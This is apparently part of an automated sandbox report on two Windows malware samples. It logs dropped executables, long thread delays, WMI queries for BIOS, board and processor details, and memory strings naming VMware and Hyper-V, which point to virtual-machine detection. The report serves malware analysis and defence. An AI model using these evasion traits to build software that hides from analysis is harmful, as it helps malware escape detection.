                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\nlafNFtr.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\FvOMJVpt.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\lvRXXeLO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\NgGUXyfg.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\GxRSZgBO.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\WhRPvofH.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\NvmJyloG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\vfTLbyDe.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\VuurXSIi.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\RONsALFU.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\BXwkEeIS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\VijSQbQY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\UTTISNjC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\PFIKyDTH.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\SeerDZBz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\xMZKLDLb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\vPiVwyIZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\jpnvyeqG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\gUKxCZnk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\AHwNgZaF.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\gHANBhKj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\zlxdWeyz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\UCgheeoa.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\axOHLXft.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\eCWwWibS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\uZZMHXbv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\CyIkUInh.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\OkvSnMWj.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\MtmZLckZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\eulplymD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\xtgFehys.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\zZntUmUz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\zdNKrvXu.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\VcGpvFqH.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\WQvQoNyx.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\wbMvdGfr.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\GLOjgbXG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\nyDFtNQJ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\OwGrvDOt.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\TvAqLAiJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\sbztrXaK.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\hhWvCZxk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\EZPbybNn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\CvAVSmWD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\SmOJiIbE.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\XaOgexda.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\lkpWjeGm.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\PYmimUsi.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\qDdNmCtS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\UTCgmFWk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\FxClgbOG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\jKmGQQAV.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\PAkihvfV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\YMBsdaAI.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\phiwHSJM.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\cCsjkXAC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\YBagvbJq.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\SIxHSvEB.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\yYBvlMUk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\iLUfkInD.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\jsgdIvVc.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ObZHJZRv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\LqfKJGTv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\iqYOFZDy.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\lHcvfWDY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\GoybbFob.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\YPpRAgYW.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\IHWAbonb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\qZdxwwVX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\cxwpdtyJ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\YWHQgFFn.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\CKTJbAfr.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe TID: 7332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7696Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 8060Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 8028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 6588Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 5140Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7472Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7324Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 1588Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 3672Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 5800Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7548Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 4948Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7848Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 7752Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 6364Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe TID: 6304Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1725545102.000000001B07D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1986309104.000000001BB47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1986309104.000000001BB89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}llowlong
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2105070637.000000001BCA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2277347660.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2414905339.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001B004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1728404902.000000001BE34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x/
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lsJ5e1BbImAprKPVMX86
